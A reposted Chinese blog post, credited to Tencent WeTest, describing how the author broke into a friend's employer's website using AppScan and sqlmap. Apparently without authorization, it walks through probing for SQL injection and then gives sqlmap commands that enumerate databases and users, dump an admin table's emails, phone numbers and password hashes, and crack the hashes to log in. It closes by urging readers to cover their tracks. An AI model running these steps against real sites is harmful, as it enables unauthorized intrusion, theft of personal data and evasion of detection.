SQL註入—我是如何一步步攻破一家互聯網公司的

来源:http://www.cnblogs.com/xionggeclub/archive/2016/07/13/5666262.html
-Advertisement-
Play Games

最近在研究Web安全相關的知識,特別是SQL註入類的相關知識。接觸了一些與SQL註入相關的工具。周末在家閑著無聊,想把平時學的東東結合起來攻擊一下身邊某個小伙伴去的公司,看看能不能得逞。不試不知道,一試還真TM得逞了,內心有些小激動,特在此寫博文一篇,來記錄下我是如何一步步攻破這家互聯網公司的。 【 ...


最近在研究Web安全相關的知識,特別是SQL註入類的相關知識。接觸了一些與SQL註入相關的工具。周末在家閑著無聊,想把平時學的東東結合起來攻擊一下身邊某個小伙伴去的公司,看看能不能得逞。不試不知道,一試還真TM得逞了,內心有些小激動,特在此寫博文一篇,來記錄下我是如何一步步攻破這家互聯網公司的。

【作案工具介紹】

(1) AppScan滲透掃描工具

Appscan是Web應用程式滲透測試舞臺上使用最廣泛的工具之一。它是一個桌面應用程式,它有助於專業安全人員進行Web應用程式自動化脆弱性評估。

(2) Sqlmap滲透測試工具

Sqlmap是一個自動化的SQL註入工具,其主要功能是掃描,發現並利用給定的URL的SQL註入漏洞。

【作案細節如下】

首先使用Appscan工具,對www.xxx.com互聯網公司的官網進行掃描,掃描結果如下: 
圖片描述

在這56個安全性問題中,找到你感興趣的鏈接,例如下麵這條:

http://www.xxx.com/system/cms/show?id=1

為何要挑出這一條呢?因為它對於SQL註入比較典型,下麵普及下SQL註入常用手法。首先用如下語句,確定該網站是否存在註入點:

http://192.168.16.128/news.php?id=1 原網站

http://192.168.16.128/news.php?id=1’ 出錯或顯示不正常

http://192.168.16.128/news.php?id=1 and 1=1 出錯或顯示不正常

http://192.168.16.128/news.php?id=1 and 1=2 出錯或顯示不正常

如果有出錯,說明存在註入點。

在判斷完http://www.xxx.com/system/cms/show?id=1該鏈接存在註入點後,接下來就啟動我們的滲透測試工具Sqlmap,進行下一步的註入工作,詳細過程如下:

1) 再次確認目標註入點是否可用:

python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1

參數:

-u:指定註入點url

結果:

圖片描述

註入結果展示:

a. 參數id存在基於布爾的盲註,即可以根據返回頁面判斷條件真假的註入。

b. 參數id存在基於時間的盲註,即不能根據頁面返回內容判斷任何信息,用條件語句查看時間延遲語句是否執行(即頁面返回時間是否增加)來判斷。

c. 資料庫類型為:MySql 5.0.12

2) 暴庫所有資料庫:

一條命令即可曝出該sqlserver中所有資料庫名稱,命令如下:

python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1  --dbs

參數:

--dbs:dbs前面有兩條杠,列出所有資料庫。

結果:

圖片描述

結果顯示該sqlserver中共包含3個可用的資料庫。

3) 獲取當前使用的資料庫

python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 --current-db

參數:

--current-db:當前所使用的資料庫。

結果:

圖片描述

4) 獲取當前資料庫使用賬戶

python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 --current-user

圖片描述

5) 列出sqlserver所有用戶

python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 --users 

圖片描述

6) 獲取當前用戶資料庫賬戶與密碼

python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 --passwords

圖片描述

結果顯示該用戶可能無讀取相關係統的許可權。

7) 列出資料庫中的表

python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 -D xxx_store --tables  

參數:

-D:指定資料庫名稱

--tables:列出表

結果:

圖片描述

結果顯示共列出了69張表。

8) 列出表中欄位

python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 -D xxx_store -T mall_admin --columns

參數:

-D:指定資料庫名稱

-T:指定要列出欄位的表

--columns:指定列出欄位

結果:

圖片描述

9)暴欄位內容

python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 -D xxx_store -T mall_admin -C "ag_id,email,id,mobile,name,password,status" --dump

參數:

-C :指定要暴的欄位

--dump:將結果導出

如果欄位內容太多,需要花費很多時間。可以指定導出特定範圍的欄位內容,命令如下:

python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 -D xxx_store -T mall_admin -C "ag_id,email,id,mobile,name,password,status" --start 1 --stop 10 --dump

參數:

--start:指定開始的行

--stop:指定結束的行

此條命令的含義為:導出資料庫xxx_store中的表mall_admin中的關於欄位(ag_id,email,id,mobile,name,password,status)中的第1到第10行的數據內容。

結果如下:

圖片描述

通過上圖,我們可以看到admin表中的用戶信息了。我們將password欄位通過md5解密,可以得到hash的原文密碼,通過用戶名和密碼,我們就可以登錄該網站了。

至此,我們已成功入侵到一家公司的後臺,並拿到了相關的數據。不過要在這裡提醒你:成功入侵只是成功了一半,另外最重要的一半是把屁股擦乾凈,不讓別人發現你了!

本文由騰訊WeTest團隊提供,更多資訊可直接戳鏈接查看:熊哥club »
轉載請註明:熊哥club »


您的分享是我們最大的動力!

-Advertisement-
Play Games
更多相關文章
  • 1. 從遠程數據表拉取數據到本地json文件 2. 將本地json文件導入到本地資料庫 ...
  • 在事務的隔離級別內容中,能夠瞭解到兩個不同的事務在併發的時候可能會發生數據的影響。細心的話可以發現事務隔離級別章節中,臟讀、不可重覆讀、幻讀三個問題都是由事務A對數據進行修改、增加,事務B總是在做讀操作。如果兩事務都在對數據進行修改則會導致另外的問題:丟失更新。這是本博文所要敘述的主題,同時引出併發 ...
  • 首先,測試版本 Mysql 5.6。 然後再看觸發器的語法 因為只是用於測試,結構上我就隨便建了,就創建一個自增列主鍵就ok了。 然後在testTri表創建一個觸發器(創建一個最簡單的觸發器奏是這樣子,簡單吧╮(╯_╰)╭) ...
  • 一、oralce的啟動順序: 1、先啟動監聽程式(對應埠1521) : []#lsnrctl start 2、啟動oracle實例: []#sqlplus / as sysdba(回車) SQL>startup --啟動的是環境變數中的預設資料庫實例 $ORACLE_SID --如果啟動多個實例: ...
  • 比如: ? 1 2 3 4 UPDATE test.tb_vobile a set a.name = '111 ' WHERE a.id = (select max(id) id from test.tb_vobile) 報錯: ? 1 2 3 4 5 6 7 [SQL]UPDATE test.tb ...
  • 1. 決定壓縮哪些對象 通過sp_estimate_data_compression_savings 評估在ROW和PAGE壓縮時分別節省的空間量。 表包含如下數據模式時,會有較好的壓縮效果: 數字類型的列和固定長度的字元類型數據,但兩者的大多數值都不會用到此類型的所有位元組。如INT列的值大多數少於 ...
  • 【需求】例如先有數據為 id | name + 1001 | lottu 1001 | xuan 1001 | rax 1002 | ak 1002 | vincent 現在需要轉換為 id | names + 1001 | lottu|xuan|rax 1002 | ak|vincent 反之;o ...
  • 1. 生成服務依賴關係 2. 線上生成依賴關係圖 訪問url:http://www.webgraphviz.com/ ...
一周排行
    -Advertisement-
    Play Games
  • 移動開發(一):使用.NET MAUI開發第一個安卓APP 對於工作多年的C#程式員來說,近來想嘗試開發一款安卓APP,考慮了很久最終選擇使用.NET MAUI這個微軟官方的框架來嘗試體驗開發安卓APP,畢竟是使用Visual Studio開發工具,使用起來也比較的順手,結合微軟官方的教程進行了安卓 ...
  • 前言 QuestPDF 是一個開源 .NET 庫,用於生成 PDF 文檔。使用了C# Fluent API方式可簡化開發、減少錯誤並提高工作效率。利用它可以輕鬆生成 PDF 報告、發票、導出文件等。 項目介紹 QuestPDF 是一個革命性的開源 .NET 庫,它徹底改變了我們生成 PDF 文檔的方 ...
  • 項目地址 項目後端地址: https://github.com/ZyPLJ/ZYTteeHole 項目前端頁面地址: ZyPLJ/TreeHoleVue (github.com) https://github.com/ZyPLJ/TreeHoleVue 目前項目測試訪問地址: http://tree ...
  • 話不多說,直接開乾 一.下載 1.官方鏈接下載: https://www.microsoft.com/zh-cn/sql-server/sql-server-downloads 2.在下載目錄中找到下麵這個小的安裝包 SQL2022-SSEI-Dev.exe,運行開始下載SQL server; 二. ...
  • 前言 隨著物聯網(IoT)技術的迅猛發展,MQTT(消息隊列遙測傳輸)協議憑藉其輕量級和高效性,已成為眾多物聯網應用的首選通信標準。 MQTTnet 作為一個高性能的 .NET 開源庫,為 .NET 平臺上的 MQTT 客戶端與伺服器開發提供了強大的支持。 本文將全面介紹 MQTTnet 的核心功能 ...
  • Serilog支持多種接收器用於日誌存儲,增強器用於添加屬性,LogContext管理動態屬性,支持多種輸出格式包括純文本、JSON及ExpressionTemplate。還提供了自定義格式化選項,適用於不同需求。 ...
  • 目錄簡介獲取 HTML 文檔解析 HTML 文檔測試參考文章 簡介 動態內容網站使用 JavaScript 腳本動態檢索和渲染數據,爬取信息時需要模擬瀏覽器行為,否則獲取到的源碼基本是空的。 本文使用的爬取步驟如下: 使用 Selenium 獲取渲染後的 HTML 文檔 使用 HtmlAgility ...
  • 1.前言 什麼是熱更新 游戲或者軟體更新時,無需重新下載客戶端進行安裝,而是在應用程式啟動的情況下,在內部進行資源或者代碼更新 Unity目前常用熱更新解決方案 HybridCLR,Xlua,ILRuntime等 Unity目前常用資源管理解決方案 AssetBundles,Addressable, ...
  • 本文章主要是在C# ASP.NET Core Web API框架實現向手機發送驗證碼簡訊功能。這裡我選擇是一個互億無線簡訊驗證碼平臺,其實像阿裡雲,騰訊雲上面也可以。 首先我們先去 互億無線 https://www.ihuyi.com/api/sms.html 去註冊一個賬號 註冊完成賬號後,它會送 ...
  • 通過以下方式可以高效,並保證數據同步的可靠性 1.API設計 使用RESTful設計,確保API端點明確,並使用適當的HTTP方法(如POST用於創建,PUT用於更新)。 設計清晰的請求和響應模型,以確保客戶端能夠理解預期格式。 2.數據驗證 在伺服器端進行嚴格的數據驗證,確保接收到的數據符合預期格 ...